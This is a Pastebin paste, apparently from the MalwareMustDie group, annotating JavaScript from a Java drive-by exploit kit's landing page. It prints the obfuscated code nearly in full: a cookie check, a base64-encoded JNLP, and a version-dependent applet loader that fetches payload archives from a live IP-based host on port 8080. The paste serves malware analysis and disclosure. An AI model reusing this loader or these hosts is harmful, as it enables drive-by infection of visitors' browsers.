Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie!
- // JNLP Exploit Kit calls using :
- // Cookie Check & Java applet depends on your Java version
- // Case: http://www.urlquery.net/report.php?id=4016167
- // Glazunov(? how to write this name?) EK
- // @unixfreaxjp:
- // This part is cookie setups...
- //
- var ws=newDate();
- ws.setDate(15+ws.getDate());
- document.cookie="stats=446501053769c06c565094b26d26e8ef;
- path=/;
- expires="+
- // @unixfreaxjp: Assemble...
- ws.toGMTString();
- // @unixfreaxjp: WTF is this?
- kvqzu="963372952943740529293246PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9Im1ubXpqY3Euam5scCIgc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9qYXZhZnguY29tIj4NCiAgPGluZm9ybWF0aW9uPg0KICAgIDx0aXRsZT5uOUc4VFpLUlZOUDJ4bnhVNDFmck91d0tBVThZeDwvdGl0bGU+DQogICAgPHZlbmRvcj52VXVvN1RvYzlldlR4Z1A1ZU05SzVSQjwvdmVuZG9yPg0KICA8L2luZm9ybWF0aW9uPg0KICAgPHJlc291cmNlcz4NCiAgICAgICAgPGoyc2UgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIgdmVyc2lvbj0iMS43KyIgLz4NCiAgICAgICAgPGphciBocmVmPSJodHRwOi8vMjEyLjEyNC4xMTUuMTk0LXN0YXRpYy5yZXZlcnNlLnNvZnRsYXllci5jb206ODA4MC8yNTEyMDI4MTI2LzU0MTEuemlwIiBtYWluPSJ0cnVlIiAvPg0KICA8L3Jlc291cmNlcz4NCiAgPGFwcGxldC1kZXNjIG1haW4tY2xhc3M9IndlcHRibGtsYWFkcC5mcXZoc3dsdmhsc2poc3JxYWJhdS5jbGFzcyIgbmFtZT0iNmhjNGhrdXpxMGQxeSIgaGVpZ2h0PSIxMCIgd2lkdGg9IjEwIj4NCiAgICAgPHBhcmFtIG5hbWU9Il9fYXBwbGV0X3Nzdl92YWxpZGF0ZWQiIHZhbHVlPSJ0cnVlIiAvPg0KICA8L2FwcGxldC1kZXNjPg0KPC9qbmxwPg==";
- // @unixfreaxjp:
- // See that above long string? is base64,
- // it means the JNLP loading like this:
- //
- // oy79ݽn:<?xml version="1.0" encoding="utf-8"?>
- // <jnlp href="mnmzjcq.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">
- // <information>
- // <title>n9G8TZKRVNP2xnxU41frOuwKAU8Yx</title>
- // <vendor>vUuo7Toc9evTxgP5eM9K5RB</vendor>
- // </information>
- // <resources>
- // <j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />
- // <jar href="http://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/5411.zip"
- // main="true" />
- //@unixfreaxjp
- // lock and load...
- pnmoy="jnlp_";uiukv="32584948301f0d71731c7b5a2f032505114c702226504c5d7d7a1b544b415070213a4c2163107f76036547267d4671196c694761394062653d03050e0b0b";aufazh="32584948301f0d71731c7b5a2f032505114c702226504c5d7d7a1b544b415070213a4c2163107f76036547267d4671196c694761394062653d00050e0a0b";
- dwssn='Java';
- ijjfxi='value';
- uybdzqp='param';
- // @unixfreaxjp:
- // Depends on your Java version.. two Applet was served for you....
- // You'll go to the URL below... for Java ver 7 OR....
- cfvxj="ftphttp://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/929";
- document.write("
- <script
- src='"+cfvxj.substr(3)+"'>
- <\/script>");</script>
- // Or else you go to the URL down below...
- <script>
- var v = PluginDetect.getVersion(dwssn).split(',');
- if (v[1] == 7) {
- document.write('<applet height="10" width="10"><' + uybdzqp + ' name="' + pnmoy + 'href" ' + ijjfxi + '="mnmzjcq.jnlp" /><' + uybdzqp + ' name="' + pnmoy + 'embedded" ' + ijjfxi + '="' + kvqzu.substr(24) + '" /><' + uybdzqp + ' name="hkqrceetlsgftlrdvk" ' + ijjfxi + '="' + uiukv + '" /></applet>');
- } else {
- document.write('<object type="application/x-java-applet" name="qwakjb" width="10" height="10"><' + uybdzqp + ' name="code" ' + ijjfxi + '="weptblklaadp.nfpmuqaplgapmsrrmnranye.class" /><' + uybdzqp + ' name="archive" ' + ijjfxi + '="http://212.124.115.194-static.reverse.softlayer.com:8080/2512028126/4.zip" /><' + uybdzqp + ' name="hkqrceetlsgftlrdvk" ' + ijjfxi + '="' + aufazh + '" /></object>');
- }
- ---
- #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement